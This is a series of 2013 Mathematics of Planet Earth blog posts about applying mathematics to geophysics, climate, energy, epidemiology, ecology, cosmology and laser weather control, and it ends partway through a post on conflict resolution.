Hans-Peter Bunge (Ludwig Maximilian University, Munich, Germany) explains the role mathematical modeling is playing in understanding mantle convection, and how optimization methods are being used to recover the past deep-earth structure.

Posted in Geophysics | Leave a comment

Building a Global Exhibition of Mathematics of Planet Earth

“Making an exhibition is nicer than going to an exhibition” is a sentence that I often use to explain the interest and curiosity of the public towards science today. It shows clearly that many people want to get involved, they are keen to interact, to think along, to participate and to create. New collaborative ways of communication carried out by science museums or science exhibitions proved to be very successful, and science communicators engage more and more in working closer with the public to jointly explore and transport insights into scientific topics.

Mathematics of Planet Earth has—from the very beginning—adopted an open approach to fulfill one of the missions of the initiative, which is to “inform the public about the essential role of the mathematical sciences in facing the challenges to our planet.” The open approach started with an invitation to the public—including mathematicians and scientists, artists, teachers—to develop modules for an exhibition. In 2012 we started the project of the “Competition of virtual modules for an open source exhibition.” Virtual means that the modules, like films, images, software programs or physical exhibits, had to be submitted in a digital format so they can be easily reproduced (printed, built) for the exhibition. But not only was everybody invited to contribute, the main idea was to make the exhibition itself available under a free and open source license. This way museums and exhibition organizers, schools, universities or any organization can easily stage the exhibition, change it, or extend it.

The winners of the competition

The competition ended in December 2012. We received 29 modules from 11 countries. A jury consisting of international experts in the field of math communication selected three winner modules and prepared a list of modules to be shown at the exhibition. The winner was a physical and interactive exhibit on “The Sphere of the Earth” by Daniel Ramos from the Museu de Mathemàtiques de Catalunya. It explains that maps are always wrong and shows the difference of many map projections using the Tissot Indicatrix. The module includes posters, a touch screen installation, a globe, rulers, the continents as physical representations (in various forms) and an activity book to experiment with the maps yourself! The second winner was “Dune Ash” by Tobias Malkmus and his team, a software program made for exhibitions which allows the users to experience the mathematics behind the propagation of volcanic ash. You can place a volcano, define a wind field and choose a dispersion parameter. Then the propagation of the ash cloud is calculated in real time by numerically solving a partial differential equation. In the program you can learn about the mathematical model behind the calculations and also about volcanoes and numerical methods in general.

The third winner was the module “The future of glaciers” by Guillaume Jouvet and his team. It is a very informative and also entertaining short film on the interaction of a glaciologist and a mathematician to answer the question: “How can we predict the future of glaciers?” At the end of the film you can choose a climate scenario for the future and observe how climate affects the glacier, for example in the coming 100 years. The film exists in English, French and German.

Michel Darche and his team from Centre Sciences prepared ten hands-on exhibits which were added to the exhibition. They present topics as the Coriolis Force, Satellites, Tectonic Plates, and the Erosion and Fractal Coasts. More information and short videos on these exhibits can be found here.

 

 

Open platform, a new competition, first events and exhibitions

All modules were compiled and form the basis of a permanent virtual and real exhibition “Mathematics of Planet Earth” (MPE). The modules are hosted by the IMAGINARY platform of the Mathematisches Forschungsinstituts Oberwolfach (MFO), an international research center based in the Black Forest of Germany. You can find them following this link or the website: www.mpe2013.org/exhibition

The MPE exhibition was launched on March 5-8 2013 at the Headquarters of UNESCO in Paris (see here for pictures and a quick review on this first exhibition). Since then the individual modules have been shown many times at conferences, science days and other events. Two examples of exhibitions where MPE modules have been shown are the exhibition in Bowdoin, USA,  and the Formas & Formulas exhibition in Lisbon, Portugal, which also included some of the Portuguese entries to the exhibition like the software program on rhumb lines and spirals. In the MiMa museum  in Oberwolfach Germany, a touch screen station with four modules (the three winners plus the very inspiring movie “Bottles and Oceanography” was installed. A bigger exhibition is now planned in collaboration with the Deutsches Technikmuseum in Berlin. It will include detailed info on the partial differential equation used for volcano ash propagation, the movement of glaciers and the propagation of tsunamis. A new module, called TsunaMath by team members of INRIA Paris-Rocquencourt is in development and will be added to the exhibition.

The authors of the competition modules have updated their work several times over the last months. New versions of all winner modules are online, some films have been translated to German and the author of the image entry “Quasicrystalline Wickerwork”, Uli Gaenshirt, has added two new pictures to his MPE gallery, among them a quasicrystal Escher style image.

A special competition for the MPE exhibition has also been organized in India. Today, November 22, the first Indian MPE exhibition will start in Bangalore in the Visvesvaraya Industrial & Technological Museum. It is organized by the International Centre for Theoretical Sciences (ICTS) and Center for Applicable Mathematics (CAM) of Tata Institute of Fundamental Research (TIFR). The exhibition is based on the four major themes: Waves, Networks, Optimization and Structures. There will be more than 30 different exhibits, like a tensegrity stool and collapsible structure, a 3d Escher sculpture, an exhibit on networks in the human body (blood / neurons), surface waves, waves on a string, fractal maps,an ecosystem model or a walk the function interactive game! It is planned that these exhibits will be added to the main MPE exhibition platform, so others can also copy them and use them for own exhibitions. More details can be found here.

The description texts of all modules have been translated to Spanish by the Spanish Mathematical Society RSME, you can find them at the Spanish MPE exhibition page.

Ongoing exhibition and invitation to participate

In 2014 several exhibitions will take place, next to the museum installation in Berlin we already have confirmed an exhibition in Seoul for the ICM 2014 congress. Coming back to the first sentence of this blog entry: we cordially invite you to be part of the future MPE exhibitions. The exhibition is open for new contributions and modules, see the open call for contributions. We also need people to support us in writing texts, adding mathematical explanations, translating texts and to establish contact to museums and exhibition organizers…

If you are interested please get in touch with us by email to submit@mpe2013.org. Let’s continue building an open and global exhibition of Mathematics of Planet Earth!

Posted in MPE Exhibit, Public Event | Leave a comment

Integrating Renewable Energy Sources into the Power Grid

There has been a global push for many years to increase our use of clean, renewable electric energy. State and local governments of many countries adopted renewable portfolio standards, which require a certain percentage of electric energy production to come from renewable resources. Reliable power system operation requires the continuous balance of supply and demand at every moment in time. However, large-scale integration of variable generations such as solar and wind can significantly alter the dynamics in a grid because wind and solar resources are intermittent. The power output can have fast fluctuation due to various reasons such as weather change and system reliability of a large number of turbines. Generators that use renewable energy to produce electricity often must be sited in locations where wind and solar resources are abundant and sufficient space exists for harnessing them. However, these locations are likely far away from population centers that ultimately consume the energy. The required transmission grids present additional challenges in various aspects including operational control, economic concerns, and policy-making.

Mathematical models that adequately represent the dynamic behavior of the entire wind or solar plant at the point of interconnection are a critical component for daily analysis and for computer model simulations. The analysis and simulations are used by system planners and operators to assess the potential impact of power fluctuations, to perform proper assessment of reliability, and to develop operating strategies that retain system stability and minimize operational cost and capital investment. Traditional models used by power industry cannot meet this goal for power grids with a large-scale integration of intermittent generators, but active research on better models is being carried out by several organizations and institutions. IEEE Power and Energy Magazine had two issues (Vol. 11(6) and Vol. 9(9)) that focus on several aspects of wind power integration.

Technically, storage is an ideal flexible resource that is quick to respond to the fluctuation of generation and demand. Its functions include provision of energy arbitrage, peak shifting, and storing of otherwise-curtailed wind. In the case of battery storage it can be deployed close to the load in a modular fashion. However, efficiency issues coupled with the high capital costs make the justification of new storage difficult. A report from the American Institute of Mathematics in 2012 arising from a workshop there dealt with some technical problems related to storage, such as the linear programming model that optimizes the required battery storage size and a nonlinear optimal control problem for batteries of predetermined size. The 17 page report is available here. Review articles can also be found in the IEEE magazine issues mentioned above.

Power systems are reliability-constrained; i.e., they must perform their intended functions under system and environmental conditions. Intuitive or rule-of-thumb approaches currently used in the industry will be inadequate for future power systems. More sophisticated quantitative techniques and indices have been developed for many years and they are still an active focus of research. The work involves many areas of mathematics, including the mathematical concepts and models of reliability, nonlinear optimization, and large-scale simulations.  References can easily be found in many journals such as IEEE Transactions on Power Systems.

Wei Kang
Naval Postgraduate School
Monterey, California

Posted in Optimization, Renewable Energy | Leave a comment

Why We Need Each Other to Succeed

Photo credit: From Martin Nowak’s slides

Martin Nowak gave a public lecture at CRM on November 6. His lecture was part of the activities of the thematic semester “Biodiversity and Evolution,” which takes place this fall.

It is a great scientific problem to understand why biodiversity has become so large on Earth. Mutations allow for the appearance of new species. Selection is an important principle of evolution. But selection works against biodiversity. The biodiversity we observe on Earth is too large to be only explained through mutations and selection. Another force is needed. Martin Nowak identified this other force in 2003: cooperation! The title of his public lecture, “The evolution of cooperation: why we need each other to succeed,” dealt with this theme.

Nowak explained how cooperation is widespread in the living world. Bacteria cooperate for the survival of the species. Eusociality describes the very sophisticated behavior of social insects like ants and bees, where each individual works for the good of the community. Human society is organized around cooperation, from the good Samaritan to the Japanese worker who accepts to work on the cleaning of Fukushima’s nuclear plant: “There are only some of us who can do this job. I’m single and young, and I feel it’s my duty to help settle this problem.” Cells in the organism cooperate and only replicate when it is timely, and cancer occurs when cells stop cooperating.

Nowak then gave a mathematical definition of cooperation. A donor pays a cost, $c$, for a recipient to get a benefit, $b$, greater than $c$. This brings us to the prisoner’s dilemma. Each prisoner has the choice of cooperating and paying the cost $c$ or defecting. From each prisoner’s point of view, whatever the other does, his better choice is to defect. This means that the rational player will choose to defect. But the other prisoner will make the same reasoning. Then they will both defect $\ldots$ and get nothing. They could each have got $b-c$ if they had behaved irrationally and had chosen to cooperate…

Natural selection chooses defection, and help is needed so as to favor cooperators over defectors. There are five mechanisms of cooperation involved in evolution: direct reciprocity, indirect reciprocity, spatial selection, group selection and kin selection.

Direct reciprocity: I help you, you help me. Tit-for-tat is a corresponding good strategy for repeated rounds of the prisoner’s dilemma: I start with cooperation; if you cooperate, I will cooperate; if you defect, then I will defect. This strategy leads to communities of cooperators, but it is unforgiving when there is an error. This leads to a search for better strategies: the generous tit-for-tat strategy incorporates the following difference: If you defect, then I will defect with probability $q=1-b/c$. This leads to an evolution of forgiveness. Another good strategy is win-stay, lose-shift. For each of these strategies the lecturer explained under which mathematical conditions the strategy performs well and leads to a community of cooperators.

Indirect reciprocity: I help you, somebody helps me. The experimental confirmation is that, by helping others, one builds one’s reputation: people help those who help others, and helpful people have a higher payoff at the end. Games of indirect reciprocity lead to the evolution of social intelligence. Since individuals need to be able to talk to each other, there should be some form of language and communication in the population.

Spatial selection: an individual interacts with his neighbors: cooperators pay a costs for neighbors to receive a benefit; it favors cooperation if $b/c>k$, where $k$ is the average number of neighbors. This is studied through spatial games, games on graphs (the graph describing a social network), and evolutionary set theory.

Group selection: “There can be no doubt that a tribe including many members who [$\ldots$] are always ready to give aid to each other and to sacrifice themselves for the common good, would be victorious over other tribes; and this would be natural selection.” (Charles Darwin, The Descent of Man, 1871) In group selection, you play the game with others in your group. Offspring are added to the group. Groups divide when reaching a certain size. Groups die. The strategy favors cooperation if $b/c>1+n/m$, where $n$ is the group size and $m$ the number of groups.

Kin selection occurs among genetically related individuals. The strategy is related with Hamilton’s rule. Nowak explained the scientific controversy around Hamilton’s rule and inclusive fitness, which is a limited and problematic concept.

Direct and indirect reciprocity are essential for understanding the evolution of any pro-social behavior in humans. Citing the lecturer: “But ‘what made us human’ is indirect reciprocity, because it selected for social intelligence and human language.”

Novak ended his beautiful lecture with an image of the Earth and the following sentence: “ We must learn global cooperation $\ldots$ and cooperation for future generations.” This started a passionate period of questions, first in the lecture room, and then around a glass of wine during the vin d’honneur.

Christiane Rousseau

Posted in Public Event, Social Systems | Leave a comment

Mathematics Can Improve Seismic Risk Protection

Mathematical and numerical modeling can be used to better understand the physics of earthquakes, improve the design of site-specific structures and facilities, and enhance seismic-risk maps.

The reliability of existing tools for earthquake and ground-motion prediction, which are based on empirical relations involving earthquake magnitude, source-to-site distance, fault mechanisms and soil properties, has recently been brought into question. Instead, numerical deterministic simulations have become increasingly popular, mainly because they provide sufficiently accurate and reliable ground-motion predictions to quantify the potential risks from earthquakes. By simulating a number of realistic earthquake scenarios, we can obtain reliable estimates of the severity of seismic events and their possible effects on large urban areas—especially important in cases where we have few historical data—and establish collapse-prevention procedures for strategic structures located in the proximity of a fault.

Northern Italy Earthquake (2012)

Three-­dimensional model of the Northern Italy earthquake (2012). Fault description (left) and computational domain (right; different colors represent different soil properties).

Northern Italy Earthquake (2012)

Northern Italy earthquake (2012). Computed peak ground velocity.

SPEED is a certified open-source code for the prediction of near-fault ground motion and the seismic response of three-dimensional structures. SPEED is the product of a collaboration of the Laboratory for Modeling and Scientific Computing (MOX) in the Department of Mathematics and the Department of Civil and Environmental Engineering at the Politecnico di Milano. The code has been tested in a number of realistic seismic events, including the earthquakes in L’Aquila, Italy (2009), Chile (2010), Christchurch in New Zealand (2011), and Northern Italy (2012).

Prof. Alfio Quarteroni
Modeling and Scientific Computing
SB-SMA-MATHICSE-CMCS
Station 8 – EPFL
CH-1015 Lausanne
Switzerland

Posted in Geophysics, Natural Disasters | Leave a comment

(Big) Data Science Meets Climate Science

Internet advertisers and the National Security Agency are not the only ones dealing with the “data deluge” lately. Scientists, too, have access to unprecedented amounts of data, both historical and real-time data from around the world. For instance, using sensors located on ocean buoys and the ocean floor, oceanographers at the National Oceanographic and Atmospheric Administration have modeled tsunamis in real-time immediately after the detection of large earthquakes. This technology was used to provide important information shortly after the 2011 Tohoku earthquake off the coast of Japan.


Atmospheric Circulation Pattern

The process of incorporating data into models is a nontrivial task and represents a large research area within the fields of weather and climate modeling. While much of this data may be real-time observations, climate scientists also deal with a significant amount of historical data, such as oxygen isotope ratios measured from glacier ice cores. A major question facing climate modelers is how best to incorporate such data into models. As climate models increase in complexity, their results become correspondingly more intricate. Such models represent climate processes spanning multiple spatial and temporal scales and must relate disparate physical phenomena. Data assimilation (DA) is a technique used to combine observations with model forecasts in order optimize model prediction. DA has many potential useful applications in climate modeling. Combining observational data with models is a mathematical issue which can manifest itself in many areas, including model parametrization, model initialization, and validation of the model prediction against observations. For instance, the continued improvement of weather and storm surge models can be attributed in large part to successful parameterizations and DA, in addition to greater computing power.

This week’s Hot Topics Workshop on “Predictability in Earth System Processes” at the Institute for Mathematics and Its Applications (IMA) at the University of Minnesota (November 18-21, 2013) will identify challenges to assimilating data in climate processes, while highlighting mathematical tools used to approach these problems in general. Specific goals of the workshop are to identify DA problems in climate modeling, and to investigate new mathematical approaches to open problems such as:

  • Improvement of weather forecasts by increasing accuracy to periods of several weeks to months through effective use of DA;
  • Effectively apply uncertainty quantification in predictions from Earth system models arising from model errors and observational errors using DA; and
  • Implementation of topological data analysis techniques to provide insight into the state space of the model.

This is an exciting workshop, as one of its primary aims is to bring together scientists and mathematicians from a wide range of subdisciplines whose paths might not typically intersect. We anticipate substantial cross-pollination of ideas at this workshop and expect to identify scientific challenges and form interdisciplinary collaborations in order to address a number of mathematical issues in climate research.

Jesse Berwald

On behalf of the Organizers
Thomas Bellsky Arizona State University
Jesse Berwald University of Minnesota, Twin Cities
Lewis Mitchell University of Vermont

Posted in Climate Modeling, Data Assimilation, Workshop Announcement | Leave a comment

Understanding the Big Bang Singularity

If you want to understand the planet Earth, then why not go back to the beginning of the Universe? The big bang is an event that we do not understand. It is thought to have happened about 13.75 billion years ago. What occurred, as we understand it, is mind blowing. The entire universe as we know it today seemed to have come out of nowhere and very quickly. This is currently described by the theory of inflation, which estimates that within $1 \cdot 10^{-36}$ and $1 \cdot 10^{-32}$ seconds the universe expanded by a factor of $10^{78}$ in volume.

Where did all this energy come from? One way to account for this energy is offered by the cyclic universe theory that basically says that prior to the big bang, there was another universe that contracted down in a “big crunch,” which then gave rise to the big bang. This process could have occurred over and over, where our universe is just one universe in the process. The cyclic universe theory has been studied by Gott and Lin (1998), Steinhard and Turok in many papers using a string theory formulation, and by many others. In the treatment of the cyclic universe theories, it is an open problem to understand how one universe could smoothly be continued into another, since the differential equations that describe the inflation become undefined (singular) at the big bang itself.

Let $t$ be a variable denoting time, where the big bang occurs at $t = 0\ $. For the universe prior to ours, $t < 0\ $, and for our universe, $t > 0\ $. A recent paper published by this author shows how to smoothly extend one universe into another through the big bang by making use of a special transformation of the variables in the differential equations. These differential equations are called the Friedmann equations, and under certain assumptions they can be reduced to a system of ordinary differential equations, which are undefined at the big bang. It has been recently proven in a paper by Belbruno (2013), that a special regularization transformation of the position, velocity, and time variables can be made, where the differential equations are smooth at the big bang and a unique solution to these differential equations can be found from one universe to another. This represents a solution to this problem that had not been previous obtained. The method of using a regularizing transformation was a new approach. This paper is entitled “On the Regularizability of the Big Bang Singularity.” The method had never been used in cosmology and previously used mainly in classical celestial mechanics. This methodology was used in a previous paper by Belbruno and Pretorius (2011) on dynamics about a black hole, entitled “A Dynamical Systems Approach to Schwarzschild Null Geodesics.”

A particularly intriguing result obtained in this paper is that the unique continuation of one universe into another is possible if and only if a key parameter in the problem, called the equation of state, can be written as a ratio of two integers which are relatively prime. Some new work by this author and BingKan Xue has generalized these results by assuming more physically relevant modeling.

The above image features a painting I did in 2006 of the universe immediately after the big bang. It illustrates the microwave background radiation of the universe, inspired by the Wilkinson Anisotropy Probe data. The most intense radiation is in red and the least in black-blue. The painting is entitled, Microwave Radiation of the Universe. (oil on canvas, 30″ x 16″, 2006). Please see my art site. .

Edward Belbruno
Department of Astrophysical Sciences
Princeton University

Posted in Astrophysics, Dynamical Systems | Leave a comment

Plowing Fields of Data

In the November 11 issue of The New Yorker there is a fascinating article by Michael Specter about The Climate Corporation, a six-year old company based in San Francisco whose main business is selling crop insurance to farmers. But they do it in a unique way by crunching vast amounts of meteorological data (50 terabytes per day) about precipitation, temperature, soil moisture to both analyze current conditions and predict future conditions.

Since not everyone has access to The New Yorker, I looked for something else written about the company and found an article from Wired by Marcus Wohlsen and dated September 9, 2012. It actually has more quantitative detail than the first article. You can read it here.

Kent E. Morrison  •  American Institute of Mathematics

Posted in Data, Extreme Events, Weather | Leave a comment

“Mathematics and Climate” — A New Text

Today, allow me to indulge in a bit of self-promotion on the occasion of the publication by the Society of Industrial and Applied Mathematics (SIAM) of a new textbook, “Mathematics and Climate,” co-authored by your friendly MPE Blogmaster, Hans Kaper, and my colleague, Hans Engler, at Georgetown University. This afternoon, we are celebrating the publication at a book release party at Georgetown University in Washington, DC. Faculty, students, university administrators, and friends and colleagues of the authors have been invited to the Department of Mathematics and Statistics to join in the celebration.

The book grew out of a course under the same title, “Mathematics and Climate,” taught by the authors at Georgetown University in 2009 for students at the upper-undergraduate and beginning graduate level and will be used as a text for a similar course in the Spring semester of the current academic year.

From the publisher’s announcement:

“This is a timely textbook aimed at students and researchers in mathematics, and statistics who are interested in current issues of climate science, as well as at climate scientists who wish to become familiar with qualitative and quantitative methods of mathematics and statistics.The authors emphasize conceptual models that capture important aspects of Earth’s climate system and present the mathematical and statistical techniques that can be applied to their analysis. Topics form climate science include the Earth’s energy balance, temperature distribution, and ocean circulation patterns; among the mathematical and statistical techniques presented in the text are dynamical systems and bifurcation theory, Fourier analysis, and extreme value theory.”

Information about the book can be found here.

Posted in Climate Modeling, Mathematics, Statistics | Leave a comment

Mathematics, Statistics, and Storm Surges

View of Hurricane Sandy. NASA Earth Observatory image by Robert Simmon with data courtesy of the NASA/NOAA GOES Project Science team.

Last week Philadelphia was a suburb of New Jersey. At least it seemed that way, with all the local news media coverage of hurricane Sandy on the one-year anniversary of its landing on the Jersey shore, on October 29, 2012. The media reports quite naturally focused on the impact of the storm on the region and the progress of the recovery. In many cases the impact was quite tragic, and recovery, while under way, still has a way to go.

Digging deeper, however, one found that there were other long-term issues that reach beyond the Jersey shore. In particular, insurance companies were forced once again to come up with better models for assessing the impact of a storm surge such as Sandy’s. Digging one layer deeper, one finds work done by many statisticians and mathematicians to better model and simulate a storm surge and to better predict the expected cost of damage from such a surge.

One learns that insurance companies –- quiet employers of people in mathematical sciences — are working hard to develop and improve impact-forecasting models for storm surges. For example, Aon Benfield is further developing impact-forecasting models, noting that “it is now more important than ever to respond to these large events by researching, developing and implementing flood catastrophe models that can better analyze the hazard of hurricane coastal and inland riverine flooding.” Work like this is crucial to efforts of insurers and re-insurers to better perform risk assessment.

Improving models and simulations for storm surge and improving statistical tools for risk assessment are major research topics within the mathematical sciences community. To cite one example, SIAM News covered work by Clint Dawson and his co-workers on modeling hurricane storm surge — Uncertainty Quantification 2012: Modeling Hurricane Storm Surge. This article gives on overview of the mathematical/computational issues in creating high-fidelity simulations of a storm surge.

Of course, the National Oceanic Atmospheric Administration (NOAA), the agency that plays a major role in weather prediction, also is involved in developing storm surge models in collaboration with research mathematicians and computational scientists. NOAA’s web site provides information on the models being developed.

NOAA’s models also caught the attention of the media; as an example, The Washington Post covered NOAA models in the August 2013 story Hurricane Center Gives Storm Surge Model a Boost.

It is interesting to those involved in the mathematical and computational aspects of these issues to see media coverage that shows the impact of the ongoing research. At the same time, it is somewhat disappointing that this work is often not mentioned in the media reports.

Posted in Natural Disasters, Risk Analysis, Uncertainty Quantification | Leave a comment

Sustainability of Aquatic Ecosystem Networks

The AARMS-CRM workshop on Sustainability of Aquatic Ecosystem Networks was held at the Fredericton Inn in Fredericton, New Brunswick, Canada, October 22-25, 2013. This workshop was the 10th in a series of 11 workshops in the pan-Canadian MPE thematic program on Models and Methods in Epidemiology, Ecology and Public Health.

The main objective of the workshop was to provide a forum for the exchange of empirical results and modelling frameworks for spatially distributed aquatic systems, with a particular focus on issues of management and sustainability. These problems are of particular interest to Canada with its thousands of lakes, many major rivers, countless streams and three bordering oceans. Understanding the connections between these waters and their ecosystems is essential to understanding the impacts of human activities. Stresses on lake populations include events upstream; introduced species spread through networks of lakes and rivers; colonizers from marine protected areas may rescue impacted ecosystems, but the stress from these impacts may also spread to protected areas. The AARMS workshop aimed to foster a cross-disciplinary exchange of ideas and techniques between mathematicians, ecologists and resource managers, leading to new opportunities for mathematicians, and new tools for managers.

The first two days of the workshop focused on mathematics of river networks, while the second two days focused on spatially explicit marine systems. In both cases, equal emphasis was placed on both detailed, data-rich models and simpler strategic models, with the simpler models providing a baseline for studies of detailed spatially explicit simulations of rivers and streams. Continuing advances in the power and availability of high performance computing lead to steadily richer hydrodynamic models for rivers and coasts, and modellers are now moving to integrate physiological and behavioural models for fish and other organisms into these detailed hydrodynamic models. At the same time, these large tactical models are balanced by studies of simpler dynamical systems on connected patches and graphs representing river networks and coastal habitats. Although there were many similarities in the mathematics for riverine and coastal systems, there were also interesting differences. As expected, spatial models of river systems were based on branching networks, and a reoccurring question was the effect of barriers on species persistence. In contrast, metapopulation models made an appearance in modelling marine systems. Even in coastal systems, where the domain might be reasonably represented by a one dimensional chain of habitats, marine organisms are free to disperse in two or three dimensions and can move from one habitat to another without passing through the intervening patches. The same is not true of river networks, where most organisms are constrained to move along the network.

The talks and discussion covered a wide variety of topics. Open data, invasive species, persistence, hydropower, range shifts, sustainable and optimal fisheries, and restoration to name a few. The list of speakers and detailed abstracts can be found on the workshop website.

We would like to acknowledge the generous support of NSF, SMB, AARMS and CRM, without which the workshop would not have been possible. We would also like to thank the helpful staff of the Fredericton Inn.

James Watmough
Department of Mathematics and Statistics
University of New Brunswick
watmough@unb.ca

Posted in Ecology, Workshop Report | Leave a comment

Contagious Behavior

There has been some press coverage of an article that appeared in the October 4, 2013, issue of Science called “Social Factors in Epidemiology” by Chris Bauch and Alison Galvani. The article highlights how social factors and social responses are intertwined in biological systems. For example, a perception that vaccines are harmful can cause a drop in vaccination coverage. The point that the authors are making is that mathematical modelers are now creating models that are tailored to include social behaviors into their systems to better predict things like the spread of a disease. Hence, getting clues from social media sources like Fackbook and Twitter is useful. (To read the article you need access to Science but a note about the article is available in Science Daily.)

While it seems nice to again (as the MPE2013 initiative likes to do) point out the usefulness of mathematics I was struck by how little mathematics was actually in the article. The authors did make a strong case that social factors are important in an anecdotal sort of way and it did appear that the mathematical models were network type models, but there seemed to be little of any mathematical substance.

Reading the article I was reminded of the work done by Martina Morris using random network models and the success of those models in predicting HIV spread. Two former blogs, from June 6th and the July 2nd, showcase the exciting work done by her and other mathematicians using random graph models. There have been several other blogs on this site devoted to modeling disease spread. I found all of these more interesting than the Science article. I also wondered how beneficial the work of Morris and others would be for the epidemiology questions asked by Bauch and Galvani. I would speculate quite a bit. I am curious how aware the different researchers are about these and other developments and ironically, if somehow, social behavior of a different sort is at play here.

Estelle Basor
AIM

Posted in Complex Systems, Dynamical Systems, Mathematics, Public Health | Leave a comment

Mathematics, Sustainability, and a Bridge to Decision Support

The November issue of The College Mathematics Journal is a special theme issue supporting the Mathematics of Planet Earth initiative, MPE 2013. The issue is freely available to all.

Of special interest is a guest editorial by Mary Lou Zeeman (Bowdoin College). It is a call to arms for the mathematics community to identify and engage, at a deeply intellectual level, with the mathematical challenges associated with decision making for sustainability.

In the article, Zeeman draws an analogy with mathematical biology, to illustrate the way mathematics and biology can enrich each other when we make the effort to build and facilitate communication between them.

You can download the article from JSTOR by clicking here. Read it, share it with your colleagues and students, and treat it as a straw-man for discussions as you come up with better ways to build up the mathematics-decision support bridge!

Posted in General | Leave a comment

Not on the Test: The Pleasures and Uses of Mathematics

On Wednesday, November 6, Inez Fung will deliver a public lecture at the Berkeley City College Auditorium on the topic “Verifying Greenhouse Gas Emissions” as part of their series Not on the Test: The Pleasures and Uses of Mathematics.

Fung has previously delivered one of the MPE 2013 invited lectures. Her MPE lecture was given at the African Institute of Math Sciences; a recording of her lecture is available on their web site. An eloquent speaker for the role of mathematics and computation in climate science, Fung has also delivered technical presentations at SIAM conferences. One such talk led to a SIAM News article in 2010, titled “Mathematical Challenges in Climate Change Science”. Her work was also featured in a SIAM News article by Dana Makenzie in 2007, “Mathematicians Confront Climate Change.”

Inez Fung’s Berkeley public lecture will begin at 7:00 p.m.

Posted in Public Event | Leave a comment

MPE Issue of the College Mathematics Journal of the MAA

The November issue of The College Mathematics Journal is a special theme issue supporting the Mathematics of Planet Earth initiative, MPE 2013. The articles in this extra large issue discuss a wide range of earth science and environmental questions. The issue is freely available to all.
 
Charles Hadlock applies undergraduate mathematics (linear equations, interpolation, geometry) to modeling the movement of water underground. Meredith Greer, Holly Ewing, Kathleen Weathers, and Kathryn Cottingham describe a mathematical/ecological collaborative study of a cyanobacterium (attractively named Gloeo) in New England lakes. Osvaldo Marrero describes a statistical method for detecting seasonal variation in an epidemic. (Such variation may betray an environmental influence.) And Christiane Rousseau describes the discovery of the Earth’s inner core by Inge Lehmann.
 
Four articles/Classroom Capsules/Student Research Projects concern climate change. Two papers (by, respectively, James Walsh and Richard McGehee, and Emek Köse and Jennifer Kunze) apply dynamical systems and differential equations to modeling global temperature; a Classroom Capsule by John Zobitz discusses carbon absorption in forests; and a Student Research Project by Lily Khadjavi describes how to coax students to model the rate of climate change.
 
The issue begins with a guest editorial by Mary Lou Zeeman relating mathematics to sustainability and concludes with a review by Ben Fusaro of the recent book “Mathematics for the Environment” by Martin Walter.
 
— Michael Henle, Editor

Posted in General | Leave a comment

Controlling Lightning?

Half-way between chemistry and physics, the exploration of applications of ultrafast laser pulses is a very promising research topic with many potential applications, including meteorology and climate. These ultrafast laser pulses range over a time scale of femtoseconds ($10^{-15}$ seconds) to attoseconds ($10^{-18}$ seconds, the natural time scale of the electron). Modern laser technology allows the generation of ultrafast (few cycle) pulses with intensities exceeding the internal electric field in atoms and molecules: $E = 5 \times 10^9\,$ V/cm, equivalent to the intensity $I = 3.5 \times 10^{16}\,$ W/cm${}^2$.

The interaction of such pulses with atoms and molecules leads to regimes where new physical phenomena can occur, such as High Harmonic Generation (HHG) from which the shortest attosecond pulses have been created. One of the major experimental discoveries in this new regime is the Laser Pulse Filamentation (LPF), first observed by Mourou and Braun in 1995, where pulses with intense narrow cones can propagate over large distances. The discovery has led to intensive investigations in physics and applied mathematics to understand new effects such as the creation of solitons, self-transformation of these pulses into white light, intensity clamping, and multiple filamentation.

Potential applications include wave-guide writing, atmospheric remote sensing and lightning guiding. Laboratory experiments show that intense and ultrafast laser pulses propagating in the atmosphere create successive optical solitons. These highly nonlinear nonperturbative phenomena are modeled by nonlinear Schroedinger equations (NLSEs), allowing the prediction of new phenomena such as “rogue” waves, also associated with “Tsunamis” in oceanography. (Nonperturbative means that it is impossible to separate the global system in two systems: a dominant system and a small perturbation of it. When such a decomposition exists, it allows using perturbation methods to analyze the solution of the global systems from the solutions of the dominant system.)

Cloud of water droplets

Cloud of water droplets generated in a cloud chamber by laser filaments (in red). The cloud is demonstrated through the scattering of a green laser beam collinear to the first one.

Field experiments of self-guided ionized filaments for real-scale atmospheric testing are carried out, for instance by Teramobile, an international project initiated jointly by the National Center for Scientific Research (CNRS) in France and the German Research Foundation (DFG). Recently it was discovered that such intense laser pulses can create optical “rogue” waves. It is also known that these intense ultrafast pulses can generate storms or hurricanes within a distance of a few kilometers.

This raises the extremely interesting question: Is there a way to use these laser pulses to control atmospheric perturbations? Research goes into at least two directions. The first one is to exploit the laser filaments induced condensation of water vapor, even in subsaturated conditions. A second one is to use laser filaments to control lightning with the hope, in particular, to be able to protect critical facilities.

A first conference on Laser-based Weather Control (LWC2011) took place in 2011. A second Conference (LWC2013) took place at the World Meteorological Organization (WMO) in Geneva last September. On the home page of the conference we find the following statement:

“As highlighted by the success of the first Conference on Laser-based Weather Control in 2011, ultra-short lasers launched into the atmosphere have emerged as a promising prospective tool for weather modulation and climate studies. Such prospects include lightning control and laser-assisted condensation, as well as the striking similarities between the non-linear optical propagation and natural phenomena like rogue waves or climate bifurcations. Although these new perspectives triggered an increasing interest and activity in many groups worldwide, the highly interdisciplinary nature of the subject limited its development, due to the need for enhanced contacts between laser and atmospheric physicists, chemists, electrical engineers, meteorologists, and climatologists. Further strengthening this link is precisely the aim of the second Conference on Laser, Weather and Climate (LWC2013) in Geneva, gathering the most prominent specialists on both sides for tutorial talks, free discussions as well as networking.”

Where is the mathematics in all this? The phenomena induced by intense ultrafast laser pulses are nonperturbative and highly nonlinear. The phenomena are studied through highly nonlinear PDEs. This is why the Centre de recherches mathématiques (CRM) is organizing a workshop “Mathematical models and methods in Laser Filamentation” at the University of Montreal, March 10-14, 2014. It is organized by André Dieter Bandrauk (Sherbrooke and CRM), Emmanuel Lorin de la Grandmaison (Carleton and CRM) and Jerome V. Moloney (Maths and Optics Center, U. Arizona).

Reference
Laser-Based Weather Control, Jérôme Kasparian, Ludger Wöste and Jean-Pierre Wolf, Optics & Photonics News, July/August 2010, OSA.

Christiane Rousseau

Posted in Weather, Workshop Announcement | Leave a comment

Mathematics and Conflict Resolution

One of the main ideas behind the MPE2013 project was to showcase how mathematics solves the problems of the planet in ways that are are analytical and useful. At the heart of this initiative is the belief that when one uses mathematical models, the results are unemotional and valid, at least given that the model is a good approximation to the problem at hand. The hope then is that those in power will pay attention to the mathematics. This of course assumes something about the reasonableness of those in power, but for topics like climate change, the neutrality of mathematics should be an advantage in arguing for policy change.

